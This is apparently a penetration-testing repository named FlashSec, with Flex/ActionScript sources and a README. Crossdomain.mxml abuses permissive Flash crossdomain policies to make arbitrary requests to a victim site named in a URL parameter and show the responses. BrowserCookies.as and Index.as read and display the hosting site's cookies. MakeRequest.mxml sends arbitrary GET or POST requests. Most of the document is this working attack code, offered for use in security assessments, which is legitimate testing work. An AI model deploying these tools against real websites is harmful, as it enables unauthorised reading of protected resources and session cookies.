├── .gitignore
├── BrowserCookies.as
├── Crossdomain.mxml
├── Index.as
├── LICENSE
├── MakeRequest.mxml
└── README.md


/.gitignore:
--------------------------------------------------------------------------------
 1 | # Build and Release Folders
 2 | bin/
 3 | bin-debug/
 4 | bin-release/
 5 | 
 6 | # Other files and folders
 7 | .settings/
 8 | 
 9 | # Project files, i.e. `.project`, `.actionScriptProperties` and `.flexProperties`
10 | # should NOT be excluded as they contain compiler settings and other important
11 | # information for Eclipse / Flash Builder.
12 | 


--------------------------------------------------------------------------------
/BrowserCookies.as:
--------------------------------------------------------------------------------
 1 | package {
 2 |     import flash.display.Sprite;
 3 |     import flash.external.ExternalInterface;
 4 |     import flash.net.URLVariables;
 5 |     
 6 |     public class BrowserCookies extends Sprite
 7 |     {
 8 |         //this will parse the cookie data
 9 |         public var _urlVariables:URLVariables;
10 |         
11 |         /**
12 |          * Return all the cookie values in one object
13 |          * @return URLVariables 
14 |          * 
15 |          */
16 |         public function getUrlVariables() : URLVariables {
17 |             return _urlVariables;
18 |         }
19 |         
20 |         /**
21 |          * Return one cookie value
22 |          * @param value String
23 |          * @return String
24 |          * 
25 |          */
26 |         public function getCookieValue(value:String) : String {
27 |             var returnValue:String = "";
28 |             
29 |             if(_urlVariables && _urlVariables[value]) {
30 |                 returnValue = _urlVariables[value];
31 |             }
32 |             
33 |             return returnValue;
34 |         }
35 |         
36 |         /**
37 |          * This will connect to the browser and pull cookies into flash 
38 |          */
39 |         public function BrowserCookies() : void{
40 |             //this will hold the data returned from javascript
41 |             var browserCookieString:String;
42 |             
43 |             //pull the data from javascript
44 |             browserCookieString = ExternalInterface.call("function(){return document.cookie}");
45 |             
46 |             //replace ; with & to make it look like a url
47 |             browserCookieString = browserCookieString.replace(/;\s/g, "&");
48 | 
49 |             //parse the cookie string into variables. you can now access cookie variables as properties of this object
50 |             if(browserCookieString) {
51 |                 _urlVariables = new URLVariables(browserCookieString);
52 |             }
53 |         }
54 |     }
55 | }
56 | 


--------------------------------------------------------------------------------
/Crossdomain.mxml:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?> 
  2 | 
  3 | <s:Application xmlns:fx="http://ns.adobe.com/mxml/2009" 
  4 | 
  5 | xmlns:s="library://ns.adobe.com/flex/spark" 
  6 | 
  7 | xmlns:mx="library://ns.adobe.com/flex/mx" minWidth="955" minHeight="600"> 
  8 | 
  9 | <fx:Script> 
 10 | 
 11 | <![CDATA[
 12 | 
 13 | import flash.display.Sprite;
 14 | import flash.events.*;
 15 | import flash.net.*;
 16 | import mx.controls.Alert;
 17 | import flash.external.ExternalInterface;
 18 |         
 19 |         var loader:URLLoader = new URLLoader();
 20 | 		[Bindable] public var html:String = "";
 21 | 		
 22 | 		public static function getHtmlParameters(queryString:String):String {
 23 | 			var param:String = ExternalInterface.call("window.location.search.toString");
 24 | 			if(!param) return '';
 25 | 			 
 26 | 			param=param.replace("\?", "&");
 27 | 			var paramArray:Array = param.split('&');
 28 | 			for(var x:int = 0; x<paramArray.length; x++) {
 29 | 			var splitArray:Array = paramArray[x].split('=');
 30 | 			 
 31 | 			var name:String = splitArray[0];
 32 | 			var value:String = splitArray[1];
 33 | 			 
 34 | 			if(queryString == name) return value;
 35 | 			}
 36 | 			 
 37 | 			return '';
 38 | 		}
 39 | 				
 40 |         public function URLLoaderExample():void {
 41 |             loader = new URLLoader();
 42 |             configureListeners(loader);
 43 | 	
 44 | 			var url:String = getHtmlParameters("url");
 45 | 			ExternalInterface.call("alert", "Making request to: " + url);
 46 | 				
 47 |             var request:URLRequest = new URLRequest(url);
 48 |             try {
 49 |                 loader.load(request);
 50 |             } catch (error:Error) {
 51 |                 trace("Unable to load requested document.");
 52 |             }
 53 |         }
 54 | 
 55 |         private function configureListeners(dispatcher:IEventDispatcher):void {
 56 |             dispatcher.addEventListener(Event.COMPLETE, completeHandler);
 57 |             dispatcher.addEventListener(Event.OPEN, openHandler);
 58 |             dispatcher.addEventListener(ProgressEvent.PROGRESS, progressHandler);
 59 |             dispatcher.addEventListener(SecurityErrorEvent.SECURITY_ERROR, securityErrorHandler);
 60 |             dispatcher.addEventListener(HTTPStatusEvent.HTTP_STATUS, httpStatusHandler);
 61 |             dispatcher.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHandler);
 62 |         }
 63 | 
 64 |         private function completeHandler(event:Event):void {
 65 |             var loader:URLLoader = URLLoader(event.target);
 66 |             html = loader.data;
 67 |                 
 68 |         }
 69 | 
 70 |         private function openHandler(event:Event):void {
 71 |             trace("openHandler: " + event);
 72 |         }
 73 | 
 74 |         private function progressHandler(event:ProgressEvent):void {
 75 |             trace("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);
 76 |         }
 77 | 
 78 |         private function securityErrorHandler(event:SecurityErrorEvent):void {
 79 |             trace("securityErrorHandler: " + event);
 80 |         }
 81 | 
 82 |         private function httpStatusHandler(event:HTTPStatusEvent):void {
 83 |             trace("httpStatusHandler: " + event);
 84 |         }
 85 | 
 86 |         private function ioErrorHandler(event:IOErrorEvent):void {
 87 |             trace("ioErrorHandler: " + event);
 88 |         }
 89 | 
 90 | 
 91 | ]]> 
 92 | 
 93 | </fx:Script> 
 94 | 
 95 | <s:TextArea text="{html}"  width="500" height="400" x="10" y="10"/> 
 96 | 
 97 | 
 98 | <s:Button label="call" click="URLLoaderExample()"  x="10" y="430"/> 
 99 | 
100 | </s:Application>


--------------------------------------------------------------------------------
/Index.as:
--------------------------------------------------------------------------------
 1 | package
 2 | {
 3 |     import flash.display.Sprite;
 4 |     import flash.text.TextField;
 5 | 	import flash.utils.describeType;
 6 |     
 7 |     public class Index extends Sprite{
 8 |         public function Index(){
 9 |             //this will pull all the cookies out of the browser
10 |             var urlVars:BrowserCookies = new BrowserCookies;
11 | 			var textField:TextField = new TextField;
12 |             
13 |             textField.width = 800;
14 |             textField.height = 200;
15 | 			
16 | 			textField.text = "Cookies:\n" ;
17 | 											
18 | 			for (var i:String in urlVars._urlVariables)
19 | 			{
20 | 				textField.text = textField.text + i + ":" + urlVars.getCookieValue(i) + "\n" ;
21 | 			}
22 | 			//textField.text = textField.text + urlVars.getUrlVariables() + "\n" ;
23 | 			           
24 |             addChild(textField);
25 |         }
26 |     }
27 | }
28 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | Copyright (c) 2014, Dionach Ltd
 2 | All rights reserved.
 3 | 
 4 | Redistribution and use in source and binary forms, with or without
 5 | modification, are permitted provided that the following conditions are met:
 6 | 
 7 | * Redistributions of source code must retain the above copyright notice, this
 8 |   list of conditions and the following disclaimer.
 9 | 
10 | * Redistributions in binary form must reproduce the above copyright notice,
11 |   this list of conditions and the following disclaimer in the documentation
12 |   and/or other materials provided with the distribution.
13 | 
14 | * Neither the name of the Dionach Ltd nor the names of its
15 |   contributors may be used to endorse or promote products derived from
16 |   this software without specific prior written permission.
17 | 
18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
19 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
20 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
22 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
23 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
25 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
26 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
27 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
28 | 


--------------------------------------------------------------------------------
/MakeRequest.mxml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?> 
 2 | 
 3 | <s:Application xmlns:fx="http://ns.adobe.com/mxml/2009" 
 4 | 
 5 | xmlns:s="library://ns.adobe.com/flex/spark" 
 6 | 
 7 | xmlns:mx="library://ns.adobe.com/flex/mx" minWidth="955" minHeight="600"> 
 8 | 
 9 | <fx:Script> 
10 | 
11 | <![CDATA[
12 | 
13 | import flash.display.Sprite;
14 | import flash.events.*;
15 | import flash.net.*;
16 | import mx.controls.Alert;
17 | import flash.external.ExternalInterface;
18 |         
19 |         var loader:URLLoader = new URLLoader();
20 | 		[Bindable] public var html:String = "";
21 | 				
22 |         public function URLLoaderExample():void {
23 |             loader = new URLLoader();
24 |             configureListeners(loader);
25 | 	
26 | 			var url:String = url_input1.text;
27 | 			var post:String = url_input2.text;
28 | 			var request:URLRequest = new URLRequest(url);
29 | 			if (post) {
30 | 				ExternalInterface.call("alert", "Making POST request to: " + url);
31 | 				request.method = URLRequestMethod.POST;
32 | 				request.data = post;
33 | 				}
34 | 			else {
35 | 				ExternalInterface.call("alert", "Making GET request to: " + url);
36 | 			}
37 | 			try {
38 | 				loader.load(request);
39 | 			} catch (error:Error) {
40 | 				trace("Unable to load requested document.");
41 | 			}
42 |         }
43 | 
44 |         private function configureListeners(dispatcher:IEventDispatcher):void {
45 |             dispatcher.addEventListener(Event.COMPLETE, completeHandler);
46 |             dispatcher.addEventListener(Event.OPEN, openHandler);
47 |             dispatcher.addEventListener(ProgressEvent.PROGRESS, progressHandler);
48 |             dispatcher.addEventListener(SecurityErrorEvent.SECURITY_ERROR, securityErrorHandler);
49 |             dispatcher.addEventListener(HTTPStatusEvent.HTTP_STATUS, httpStatusHandler);
50 |             dispatcher.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHandler);
51 |         }
52 | 
53 |         private function completeHandler(event:Event):void {
54 |             var loader:URLLoader = URLLoader(event.target);
55 |             html = loader.data;
56 |                 
57 |         }
58 | 
59 |         private function openHandler(event:Event):void {
60 |             trace("openHandler: " + event);
61 |         }
62 | 
63 |         private function progressHandler(event:ProgressEvent):void {
64 |             trace("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);
65 |         }
66 | 
67 |         private function securityErrorHandler(event:SecurityErrorEvent):void {
68 |             trace("securityErrorHandler: " + event);
69 |         }
70 | 
71 |         private function httpStatusHandler(event:HTTPStatusEvent):void {
72 |             trace("httpStatusHandler: " + event);
73 |         }
74 | 
75 |         private function ioErrorHandler(event:IOErrorEvent):void {
76 |             trace("ioErrorHandler: " + event);
77 |         }
78 | 
79 | 
80 | ]]> 
81 | 
82 | </fx:Script> 
83 | 
84 | <s:TextInput id="url_input1" text="[URL] ex: http://www.example.com/?id=1" width="500" x="10" y="0"/>
85 | 
86 | <s:TextInput id="url_input2" text="[POST] ex: test=1 (delete text for GET requests)" width="500" x="10" y="30"/>
87 | 
88 | <s:TextArea text="Result &#13; {html}"  width="500" height="400" x="10" y="60"/> 
89 | 
90 | <s:Button label="Send" click="URLLoaderExample()"  x="10" y="470"/> 
91 | 
92 | </s:Application>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | FlashSec
 2 | ========
 3 | 
 4 | ##Introduction
 5 | 
 6 | This repository aims to compile scripts and tools that can be used during penetration tests to assess the security of different flash related scenarios.
 7 | 
 8 | ##Contents of the project
 9 | 
10 | - Crossdomain.mxml: 
11 | Script written in FLEX that exploits permissive _crossdomain flash policy files_ to make arbitrary requests to the target website.
12 | To compile just download the FLEX SDK (available at http://www.adobe.com/devnet/flex/flex-sdk-download.html) and run _mxmlc_:
13 | 
14 | ```
15 | $ ./mxmlc Crossdomain.mxml
16 | Loading configuration file C:\Flex\frameworks\flex-config.xml 
17 | C:\Flex\bin\Crossdomain.swf (535802 bytes)
18 | ```
19 | The script expects a *url* parameter pointing to the vulnerable site, i.e.: http://example.com/Crossdomain.swf?url=http://victim.com/protectedResource
20 | 
21 | - BrowserCookies.as and Index.as:
22 | Script written in Action Script to _read the cookies_ of the website where the file is hosted at using flash.
23 | To compile just download the FLEX SDK (available at http://www.adobe.com/devnet/flex/flex-sdk-download.html) and run _mxmlc_ (make sure both files are in the same folder):
24 | 
25 | ```
26 | $ ./mxmlc Index.as
27 | Loading configuration file C:\Flex\frameworks\flex-config.xml
28 | C:\Flex\bin\Index.swf (1097 bytes)
29 | 


--------------------------------------------------------------------------------